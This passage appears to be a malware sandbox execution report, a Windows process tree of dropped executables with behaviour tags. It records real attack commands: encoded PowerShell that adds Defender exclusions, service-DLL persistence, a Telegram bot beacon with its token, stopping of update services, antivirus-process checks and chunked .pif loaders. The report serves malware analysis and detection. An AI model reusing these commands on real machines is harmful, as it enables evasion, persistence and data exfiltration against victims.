C:\Users\Admin\AppData\Local\Temp\Files\NoMoreRansom.exe"C:\Users\Admin\AppData\Local\Temp\Files\NoMoreRansom.exe"3⤵
- Adds Run key to start application
PID:26912
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp3.exe"C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp3.exe"3⤵PID:26980
-
-
C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe"C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe"3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:12040
-
-
C:\Users\Admin\AppData\Local\Temp\Files\sjkhjkh.exe"C:\Users\Admin\AppData\Local\Temp\Files\sjkhjkh.exe"3⤵PID:7652
-
-
C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"3⤵PID:27676
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"4⤵PID:27704
-
C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"5⤵
- Loads dropped DLL
- Adds Run key to start application
PID:27788 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c mkdir "\\?\C:\Windows \System32"6⤵PID:34788
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows \System32\printui.exe"6⤵PID:34880
-
C:\Windows \System32\printui.exe"C:\Windows \System32\printui.exe"7⤵
- Loads dropped DLL
PID:34948 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"8⤵PID:39684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"9⤵
- Command and Scripting Interpreter: PowerShell
PID:39752
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"8⤵PID:31800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"9⤵
- Command and Scripting Interpreter: PowerShell
PID:15620
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc create x187347 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x187347\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x187347.dat" /f && sc start x1873478⤵PID:38496
-
C:\Windows\system32\sc.exesc create x187347 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto9⤵
- Launches sc.exe
PID:16076
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\services\x187347\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x187347.dat" /f9⤵
- Modifies registry key
PID:38268
-
-
C:\Windows\system32\sc.exesc start x1873479⤵
- Launches sc.exe
PID:38316
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows\System32\console_zero.exe"8⤵PID:39516
-
C:\Windows\System32\console_zero.exe"C:\Windows\System32\console_zero.exe"9⤵PID:38384
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows\System32\bav64.exe"8⤵PID:16644
-
C:\Windows\System32\bav64.exe"C:\Windows\System32\bav64.exe"9⤵PID:19468
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@GYHASOLS: Installed success.'});"8⤵PID:18604
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@GYHASOLS: Installed success.'});"9⤵
- Command and Scripting Interpreter: PowerShell
PID:19512
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"6⤵PID:34968
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak7⤵
- Delays execution with timeout.exe
PID:35036
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"4⤵PID:27716
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak5⤵
- Delays execution with timeout.exe
PID:27820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe"C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe"3⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:27916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwAVQBrAG8AZABiAGMAZABjAGwALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwAVQBrAG8AZABiAGMAZABjAGwALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE4AdgBhAHUAcgBuAGgAcQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAHYAYQB1AHIAbgBoAHEALgBlAHgAZQA=4⤵PID:33768
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe"C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe"4⤵
- Drops file in Windows directory
PID:34348
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"3⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:31560 -
C:\Windows\sysmablsvr.exeC:\Windows\sysmablsvr.exe4⤵
- Modifies security service
- Windows security bypass
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:33236 -
C:\Users\Admin\AppData\Local\Temp\2792933412.exeC:\Users\Admin\AppData\Local\Temp\2792933412.exe5⤵PID:33872
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:34800
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:35164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:34888
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:35284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2134729423.exeC:\Users\Admin\AppData\Local\Temp\2134729423.exe5⤵PID:19952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\foggy-mountains.exe"C:\Users\Admin\AppData\Local\Temp\Files\foggy-mountains.exe"3⤵
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:33096 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm4⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:35400 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffce6fd46f8,0x7ffce6fd4708,0x7ffce6fd47185⤵PID:35444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:25⤵PID:35704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 /prefetch:35⤵PID:35720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:85⤵PID:35888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:15⤵PID:36160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:15⤵PID:36168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:15⤵PID:8324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:15⤵PID:12652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:85⤵PID:37136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:85⤵PID:39612
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe"3⤵PID:35148
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RedSystem.exe"C:\Users\Admin\AppData\Local\Temp\Files\RedSystem.exe"3⤵PID:35200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 35200 -s 8524⤵
- Program crash
PID:34336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 35200 -s 13004⤵
- Program crash
PID:35464
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"3⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:35296 -
C:\Users\Admin\sysppvrdnvs.exeC:\Users\Admin\sysppvrdnvs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Windows security modification
PID:36476 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
PID:12332 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:12456
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵PID:12384
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:12716
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:12764
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:12812
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:12852
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:12940
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\88aext0k.exe"C:\Users\Admin\AppData\Local\Temp\Files\88aext0k.exe"3⤵PID:36640
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:39060
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:39068
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:39088
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:39120
-
-
C:\Windows\explorer.exeexplorer.exe4⤵PID:39208
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\VidsUsername.exe"C:\Users\Admin\AppData\Local\Temp\Files\VidsUsername.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:12428 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Recreation Recreation.bat & Recreation.bat4⤵
- System Location Discovery: System Language Discovery
PID:12708 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:37080
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
PID:37096
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:37468
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵
- System Location Discovery: System Language Discovery
PID:37476
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1951975⤵PID:37580
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "RESOLVEPHONESBLESSFRANK" Donated5⤵
- System Location Discovery: System Language Discovery
PID:37624
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Arthritis + ..\Canyon + ..\Knights + ..\Movies + ..\Sequence + ..\Nascar + ..\Solve + ..\Cio + ..\Strategy + ..\Amounts + ..\Hans + ..\America + ..\Provincial + ..\Downtown + ..\Browser + ..\Afford + ..\Info + ..\Ll + ..\Intersection + ..\Rj + ..\Poetry + ..\Reality + ..\Cliff l5⤵
- System Location Discovery: System Language Discovery
PID:37664
-
-
C:\Users\Admin\AppData\Local\Temp\195197\Earl.pifEarl.pif l5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:37700
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:37728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\chicken123.exe"C:\Users\Admin\AppData\Local\Temp\Files\chicken123.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:12888 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:12960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12888 -s 2564⤵
- Program crash
PID:13056
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\DivineDialogue.exe"C:\Users\Admin\AppData\Local\Temp\Files\DivineDialogue.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:13204 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Prerequisite Prerequisite.bat & Prerequisite.bat4⤵
- System Location Discovery: System Language Discovery
PID:13384 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:15356
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:8428
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:40568
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:4968
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1158395⤵PID:4832
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "ISTTRANSACTIONSCONFCOMMENTARY" Grew5⤵PID:40936
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Butter + ..\Community + ..\Efficiently + ..\Tyler + ..\Seas + ..\California + ..\Skip + ..\Publisher + ..\Disappointed + ..\We + ..\Ll + ..\Time + ..\Terrible + ..\Anal + ..\Fleece + ..\Always + ..\Tcp l5⤵PID:3988
-
-
C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pifLeaving.pif l5⤵PID:8840
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:8744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\9402.tmp.exe"C:\Users\Admin\AppData\Local\Temp\Files\9402.tmp.exe"3⤵
- System Location Discovery: System Language Discovery
PID:13476 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4DB7.tmp\4DB8.tmp\4DC8.bat C:\Users\Admin\AppData\Local\Temp\Files\9402.tmp.exe"4⤵PID:13532
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13548
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13568
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13584
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13600
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13628
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13644
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13660
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13676
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13716
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13824
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13840
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13880
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:13932
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14076
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14212
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14300
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14332
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14364
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14396
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14428
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14528
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14496
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14460
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14560
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14592
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14620
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14652
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14680
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14696
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14712
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14728
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14744
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14760
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14776
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14792
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14832
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14864
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14900
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14932
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:14972
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:37904
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:37936
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:37968
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38000
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38036
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38068
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38100
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38132
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38160
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38192
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38224
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38256
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38292
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38324
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38356
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38388
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38416
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38448
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38480
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38572
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38600
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38616
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38632
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38656
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38672
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38696
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38720
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38744
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38768
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38792
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38816
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38836
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38856
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38880
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38900
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38924
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38948
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:38980
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39000
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39020
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39044
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39456
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39488
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39512
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39540
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39568
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39592
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39620
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39636
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39652
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39668
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39728
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39780
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:15080
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39920
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39896
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39880
-
-
C:\Windows\system32\msg.exemsg * virus5⤵PID:39856
-
-
